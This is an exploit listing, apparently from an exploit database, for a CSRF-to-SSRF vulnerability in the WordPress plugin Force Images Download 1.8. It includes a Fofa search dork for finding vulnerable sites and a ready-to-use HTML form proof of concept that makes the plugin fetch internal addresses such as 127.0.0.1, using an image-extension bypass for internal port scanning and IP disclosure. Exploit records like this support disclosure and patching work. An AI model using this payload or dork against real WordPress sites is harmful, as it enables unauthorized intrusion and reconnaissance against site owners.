Exploit for WordPress Force Images Download 1.8 CSRF / SSRF

## https://sploitus.com/exploit?id=PACKETSTORM:173513
# Exploit Author : Etharus  
# Vulnerability : Cross Site Request Forgery to Server Side Request Forgery  
# Impact : internal ip disclosure , file extension bypass, internal port scan.  
# Product Vendor : Nazakat Ali  
# Version Tested : 1.8  
# Date : 14/07/2023  
# Fofa Dork : "/wp-content/plugins/wp-force-images-download/"  
  
<form id="wpfid-form" method="post" action="https://target/wp-content/plugins/wp-force-images-download/wpfid.php">  
<input name="wpfid_pic_url" type="text" placeholder="[TARGET URL] : http://127.0.0.1/?r=bypass.jpg">  
<br><input name="new_name" type="hidden" value="">  
<button style="background: gray; --darkreader-inline-bgcolor: #60686c; --darkreader-inline-bgimage: none;" class="d-btn" id="wpfid_button" type="submit" title="Download" data-darkreader-inline-bgcolor="" data-darkreader-inline-bgimage="">  
<span style="line-height: 30px;" class="wpfid_title">Download</span>  
</button>  
</form>